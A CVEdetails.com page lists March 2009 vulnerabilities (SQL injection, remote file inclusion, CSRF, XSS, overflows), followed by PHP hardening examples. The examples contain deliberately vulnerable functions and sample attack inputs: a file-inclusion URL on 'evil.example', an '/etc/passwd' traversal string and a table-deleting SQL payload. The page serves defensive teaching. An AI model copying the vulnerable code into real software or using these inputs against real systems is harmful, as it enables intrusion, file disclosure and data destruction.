CVEdetails.com the ultimate security vulnerability data source
Security Vulnerabilities Published In March 2009

# | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date | Score (CVSS v2 base, 0-10) | Gained Access Level | Access (vector) | Complexity | Authentication | Conf. | Integ. | Avail. (impact)
Each entry below spans four lines: the first carries the row index, CVE ID, CWE ID, exploit count (blank when none is recorded), vulnerability type(s) and the publish/update dates; the second is the CVSS v2 base score; the third gives gained access level, access vector, access complexity, authentication, and the confidentiality, integrity and availability impacts; the fourth is the description.
401 CVE-2008-6487 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
Multiple SQL injection vulnerabilities in login.asp in Digiappz DigiAffiliate 1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) admin and (2) password fields.
402 CVE-2008-6486 94 Exec Code File Inclusion 2009-03-18 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in slideshow_uploadvideo.content.php in SharedLog, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[root_dir] parameter.
403 CVE-2008-6485 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in SoftComplex PHP Image Gallery allows remote attackers to execute arbitrary SQL commands via the ctg parameter.
404 CVE-2008-6484 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in login.php in Mole Group Taxi Map Script (aka Taxi Calc Dist Script) allows remote attackers to execute arbitrary SQL commands via the user field.
405 CVE-2008-6483 94 Exec Code File Inclusion 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
PHP remote file inclusion vulnerability in admin.googlebase.php in the Ecom Solutions VirtueMart Google Base (aka com_googlebase or Froogle) component 1.1 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
406 CVE-2008-6482 94 Exec Code File Inclusion 2009-03-18 2017-09-28
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in admin.treeg.php in the Flash Tree Gallery (com_treeg) component 1.0 for Joomla!, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the mosConfig_live_site parameter.
407 CVE-2008-6481 89 Exec Code Sql 2009-03-17 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Versioning component (com_versioning) 1.0.2 in Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit task to index.php.
408 CVE-2008-6480 352 CSRF 2009-03-16 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in engine/modules/imagepreview.php in Datalife Engine 6.7 allows remote attackers to hijack the authentication of arbitrary users for requests that use a modified image parameter.
409 CVE-2008-6479 352 CSRF 2009-03-16 2018-10-11
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the "change password" feature in the VZPP web interface for Parallels Virtuozzo 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to modify the password via a link or IMG tag to vz/cp/pwd.
410 CVE-2008-6478 352 CSRF 2009-03-16 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the file manager in the VZPP web interface for Parallels Virtuozzo 365.6.swsoft (build 4.0.0-365.6.swsoft) and 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to create and delete arbitrary files as the administrator via a link or IMG tag to (1) create-file and (2) list-control in vz/cp/vzdir/infrman/envs/files/; or modify system configuration via the path parameter to vz/cp/vzdir/infrman/envs/files/index.
411 CVE-2008-6477 89 Exec Code Sql 2009-03-16 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in Mumbo Jumbo Media OP4 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
412 CVE-2008-6476 79 XSS 2009-03-16 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in blog/search.aspx in BlogEngine.NET allows remote attackers to inject arbitrary web script or HTML via the q parameter.
413 CVE-2008-6475 89 Exec Code Sql 2009-03-16 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the guestbook component (components/guestbook/guestbook.php) in Drake CMS 0.4.11 and earlier allows remote attackers to execute arbitrary SQL commands via the Via HTTP header (HTTP_VIA) to index.php.
414 CVE-2008-6474 94 2009-03-16 2018-10-30
9.0
Admin Remote Low Single system Complete Complete Complete
The management interface in F5 BIG-IP 9.4.3 allows remote authenticated users with Resource Manager privileges to inject arbitrary Perl code via unspecified configuration settings related to Perl EP3 with templates, probably triggering static code injection.
415 CVE-2008-6473 255 2009-03-16 2018-10-11
6.4
None Remote Low Not required None Partial Partial
_blogadata/include/init_pass2.php in Blogator-script 0.95 allows remote attackers to change the password for arbitrary users via a modified "a" parameter with a "%" wildcard symbol in the b parameter.
416 CVE-2008-6472 399 DoS 2009-03-14 2017-09-28
4.3
None Remote Medium Not required None None Partial
The WLCCP dissector in Wireshark 0.99.7 through 1.0.4 allows remote attackers to cause a denial of service (infinite loop) via unspecified vectors.
417 CVE-2008-6471 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in detail.php in MountainGrafix easyLink 1.1.0 allows remote attackers to execute arbitrary SQL commands via the cat parameter in a show action.
418 CVE-2008-6470 +Info 2009-03-13 2017-08-16
5.0
None Remote Low Not required Partial None None
Multiple unspecified vulnerabilities in ClanSphere before 2008.2.1 allow remote attackers to obtain sensitive information, and possibly have unknown other impact, via vectors related to "javascript insert" and the (1) mods/messages/getusers.php and (2) mods/abcode/listimg.php files. NOTE: some of these details are obtained from third party information.
419 CVE-2008-6469 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in PlainCart 1.1.2 allows remote attackers to execute arbitrary SQL commands via the p parameter.
420 CVE-2008-6468 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in Diesel Pay allows remote attackers to execute arbitrary SQL commands via the area parameter in a browse action.
421 CVE-2008-6467 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in jobs/jobseekers/job-info.php in Diesel Job Site allows remote attackers to execute arbitrary SQL commands via the job_id parameter.
422 CVE-2008-6466 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in image_gallery.php in the Akira Powered Image Gallery (image_gallery) plugin 0.9.6.2 for e107 allows remote attackers to execute arbitrary SQL commands via the image parameter in an image-detail action.
423 CVE-2008-6465 79 XSS 2009-03-13 2017-08-16
4.3
None Remote Medium Not required None Partial None
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
424 CVE-2008-6464 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
425 CVE-2008-6463 89 Exec Code Sql 2009-03-13 2009-08-19
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Diocese of Portsmouth Church Search (pd_churchsearch) extension before 0.1.1, and 0.2.10 and earlier 0.2.x versions, an extension for TYPO3, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
426 CVE-2008-6462 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the My quiz and poll (myquizpoll) extension before 0.1.4 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
427 CVE-2008-6461 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Random Prayer 2 (ste_prayer2) extension before 0.0.3 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
428 CVE-2008-6460 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Simple Random Objects (mw_random_objects) extension 1.0.3 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
429 CVE-2008-6459 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the auto BE User Registration (autobeuser) extension 0.0.2 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
430 CVE-2008-6458 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the FE address edit for tt_address & direct mail (dmaddredit) extension 0.4.0 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
431 CVE-2008-6457 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Swigmore institute (cgswigmore) extension before 0.1.2 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
432 CVE-2008-6456 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the HBook (h_book) extension 2.3.0 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
433 CVE-2008-6455 287 2009-03-13 2017-08-16
6.8
User Remote Medium Not required Partial Partial Partial
Session fixation vulnerability in Edikon phpShop 0.8.1 allows remote attackers to hijack web sessions via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
434 CVE-2008-6454 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in section.php in 6rbScript 3.3 allows remote attackers to execute arbitrary SQL commands via the singerid parameter in a singers action.
435 CVE-2008-6453 22 Dir. Trav. 2009-03-13 2017-09-28
4.3
None Remote Medium Not required Partial None None
Directory traversal vulnerability in section.php in 6rbScript 3.3, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the name parameter.
436 CVE-2008-6452 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in show_vote.php in Oceandir 2.9 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
437 CVE-2008-6451 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in humor.php in jPORTAL 2 allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: this might overlap CVE-2004-2036 or CVE-2005-3509.
438 CVE-2008-6450 79 XSS 2009-03-09 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in Under Construction, Baby (UCB) PC2M 0.9.22.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
439 CVE-2008-6449 352 CSRF 2009-03-09 2017-08-16
4.0
None Remote High Not required None Partial Partial
Cross-site request forgery (CSRF) vulnerability in multiple Century Systems routers including XR-410 before 1.6.9, XR-510 before 3.5.3, XR-440 before 1.7.8, and other XR series routers from XR-510 to XR-730 allows remote attackers to modify configuration as the administrator via unknown vectors.
440 CVE-2008-6448 79 XSS 2009-03-09 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in install.cgi in SKYARC System MTCMS WYSIWYG Editor allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
441 CVE-2008-6447 119 Exec Code Overflow 2009-03-09 2017-09-28
9.3
None Remote Medium Not required Complete Complete Complete
Buffer overflow in emmailstore.dll 6.5.0.3 in the QuikSoft EasyMail MailStore ActiveX control allows remote attackers to execute arbitrary code via a long first argument to the CreateStore method.
442 CVE-2008-6446 94 2009-03-09 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
Static code injection vulnerability in the Guestbook component in CMS MAXSITE allows remote attackers to inject arbitrary PHP code into the guestbook via the message parameter.
443 CVE-2008-6445 287 2009-03-09 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
Unspecified vulnerability in YourPlace before 1.0.1 has unknown impact and attack vectors, possibly related to improper authentication and the ability to upload arbitrary PHP code. NOTE: some of these details are obtained from third party information.
444 CVE-2008-6444 119 Exec Code Overflow 2009-03-09 2018-10-11
10.0
Admin Remote Low Not required Complete Complete Complete
Stack-based buffer overflow in CSTransfer.dll in Baidu Hi IM might allow remote attackers to execute arbitrary code via a crafted packet, probably related to an improper length value.
445 CVE-2008-6443 89 Exec Code Sql 2009-03-09 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in forum_duzen.php in phpKF allows remote attackers to execute arbitrary SQL commands via the fno parameter.
446 CVE-2008-6442 2009-03-09 2017-08-16
5.8
None Remote Medium Not required None Partial Partial
Insecure method vulnerability in Sina Inc. DLoader Class ActiveX Control allows remote attackers to overwrite arbitrary files via a URL in the first parameter to the DonwloadAndInstall method. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
447 CVE-2008-6441 134 Exec Code 2009-03-09 2018-10-11
9.3
Admin Remote Medium Not required Complete Complete Complete
Format string vulnerability in the Epic Games Unreal engine client, as used in multiple games, allows remote servers to execute arbitrary code via (1) the CLASS parameter in a DLMGR command, (2) a malformed package (PKG), and possibly (3) the LEVEL parameter in a WELCOME command.
448 CVE-2008-6440 287 +Info 2009-03-06 2009-03-10
5.0
None Remote Low Not required Partial None None
Cerberus Helpdesk before 4.0 (Build 600) allows remote attackers to obtain sensitive information via direct requests for "controllers ... that aren't standard helpdesk pages," possibly involving the (1) /display and (2) /kb URIs.
449 CVE-2008-6439 79 XSS 2009-03-06 2018-10-11
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in search_results.php in ABK-Soft AbleDating 2.4 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
450 CVE-2008-6438 89 Exec Code Sql 2009-03-06 2018-10-11
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in macgurublog_menu/macgurublog.php in the MacGuru BLOG Engine plugin 2.2 for e107 allows remote attackers to execute arbitrary SQL commands via the uid parameter, a different vector than CVE-2008-2455. NOTE: it was later reported that 2.1.4 is also affected.
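The two file-path classes in this listing, PHP remote file inclusion through register_globals (CVE-2008-6486, CVE-2008-6483, CVE-2008-6482) and directory traversal through a request parameter (CVE-2008-6453), share one root cause: a filesystem path assembled from request data. The following is an added example, not code from SharedLog, the Joomla! components or 6rbScript; the file names, the `page` and `name` parameters and the `pages` whitelist are hypothetical, and the hardened functions are written for PHP 7.4 or later.

```php
<?php
// Added example (not any listed product's code). Hypothetical paths and parameters.

// ---- Vulnerable pattern: register_globals remote file inclusion ----
// With register_globals=On every request parameter becomes a global before the
// script runs, so ?mosConfig_absolute_path=http://evil.example/x.txt? defines a
// variable the script never initialised. PHP before 5.2 fetched URL includes
// whenever allow_url_fopen was on; since 5.2 allow_url_include must also be on.
function vulnerable_include(): void
{
    global $mosConfig_absolute_path;        // never assigned here: attacker's choice
    include $mosConfig_absolute_path . '/administrator/helper.php';
}

// Quick checks on a legacy host; both must be false.
function register_globals_on(): bool
{
    return filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN);
}
function allow_url_include_on(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// ---- Hardened include: the request selects a key, never a path ----
define('APP_BASE', __DIR__);               // anchored to the code, not to request data

function safe_include(string $page): void
{
    $pages = [
        'home'    => APP_BASE . '/pages/home.php',
        'gallery' => APP_BASE . '/pages/gallery.php',
    ];
    if (!isset($pages[$page])) {
        http_response_code(404);
        exit('unknown page');
    }
    include $pages[$page];
}

// ---- Directory traversal (CVE-2008-6453 pattern): ?name=../../../../etc/passwd ----
// The advisory's "when magic_quotes_gpc is disabled" condition refers to PHP
// backslash-escaping quotes and NUL bytes in request data. That only defeats a
// %00 truncation trick, never the ../ sequences, and it is gone since PHP 5.4.
// The control is to resolve the path and prove it stays inside the base directory.
function safe_read(string $name, string $dir): ?string
{
    if (strpos($name, "\0") !== false) {     // NUL would truncate the path in C-level calls
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $name);    // resolves ".." and symlinks; false if missing
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                         // resolved target escaped $dir
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Usage (hypothetical routes):
// safe_include($_GET['page'] ?? 'home');
// echo safe_read($_GET['name'] ?? '', APP_BASE . '/sections') ?? 'no such file';
```

The prefix check compares against `$base . DIRECTORY_SEPARATOR` rather than `$base` alone so that a sibling directory such as `/var/www/sections2` is not accepted when the base is `/var/www/sections`.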
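Most rows on this page are SQL injection through a single request parameter; CVE-2008-6475 is the reminder that an HTTP header (`Via`, surfaced as `HTTP_VIA`) is request data like any other. The block below is an added example with a hypothetical guestbook schema, not code from Drake CMS or any product listed above; it uses PDO with the SQLite driver so it runs offline, and the `vulnerable_insert_sql` function only builds the string so the reader can see what the injected query becomes.

```php
<?php
// Added example (not any listed product's code). Hypothetical schema; needs pdo_sqlite.

// ---- Vulnerable: interpolation. A request carrying
//   Via: x'); DELETE FROM guestbook; --
// turns the INSERT below into
//   INSERT INTO guestbook (name, via) VALUES ('bob', 'x'); DELETE FROM guestbook; --')
// Whether the second statement runs depends on the driver; a UNION-based read
// through the same quote needs no stacking at all.
function vulnerable_insert_sql(string $name, string $via): string
{
    return "INSERT INTO guestbook (name, via) VALUES ('$name', '$via')";
}

// ---- Hardened: prepared statements, values travel separately from the SQL ----
function open_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE guestbook (id INTEGER PRIMARY KEY, name TEXT NOT NULL, via TEXT)');
    return $db;
}

function safe_insert(PDO $db, string $name, string $via): int
{
    $stmt = $db->prepare('INSERT INTO guestbook (name, via) VALUES (:name, :via)');
    $stmt->execute([':name' => $name, ':via' => $via]);
    return (int) $db->lastInsertId();
}

function find_by_id(PDO $db, string $id): ?array
{
    // Numeric column: validate the type, then bind as an integer.
    // "1 OR 1=1" fails ctype_digit and never reaches the database.
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name, via FROM guestbook WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo with constructed input: the payload is stored literally, nothing executes.
$db  = open_db();
$via = "x'); DELETE FROM guestbook; --";   // what a hostile Via header might carry
$id  = safe_insert($db, 'bob', $via);
$row = find_by_id($db, (string) $id);
assert($row !== null && $row['via'] === $via);
assert(find_by_id($db, '1 OR 1=1') === null);
echo vulnerable_insert_sql('bob', $via), PHP_EOL;   // shows the broken query for comparison
```

Against MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to false so the statement is prepared on the server rather than client-side escaped, and read `$_SERVER['HTTP_VIA']` (or any other header) through the same bound parameters as form fields.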
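The CSRF entries (CVE-2008-6480, CVE-2008-6479, CVE-2008-6478, CVE-2008-6449) all describe state-changing actions that a link or `IMG` tag can trigger with the victim's session cookie. The following is an added example of the synchronizer-token pattern with a hypothetical password-change form; it is not the Virtuozzo, Datalife Engine or Century Systems code, and it needs PHP 7.3 or later for the `samesite` cookie option.

```php
<?php
// Added example (not any listed product's code). Hypothetical form and route.

// Lax SameSite withholds the session cookie from cross-site <img> loads and
// cross-site POSTs in current browsers; the token below is the control that
// does not depend on the browser.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // per-session secret
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST carrying this session's token, compared in constant time.
function csrf_valid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {                 // a bare link or <img> can only issue GET
        return false;
    }
    $known = $session['csrf_token'] ?? '';
    $sent  = $post['csrf_token'] ?? '';
    if ($known === '' || !is_string($sent)) { // an empty known token must never match
        return false;
    }
    return hash_equals($known, $sent);
}

function password_form(): string
{
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/change-password">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<input type="password" name="new_password">'
         . '<button>Change</button></form>';
}

// Handler: GET never changes state, and a POST without the token is refused.
$method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
if ($method === 'POST') {
    if (!csrf_valid($method, $_POST, $_SESSION)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    // ... update the password for the logged-in user here ...
} else {
    echo password_form();
}
```

Rejecting GET outright is what closes the `IMG`-tag vector in these advisories; the token is what stops a cross-site form that issues a POST, and `hash_equals` keeps the comparison from leaking the token byte by byte.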
Total number of vulnerabilities: 554. Page 9 of 12.
CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of the user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.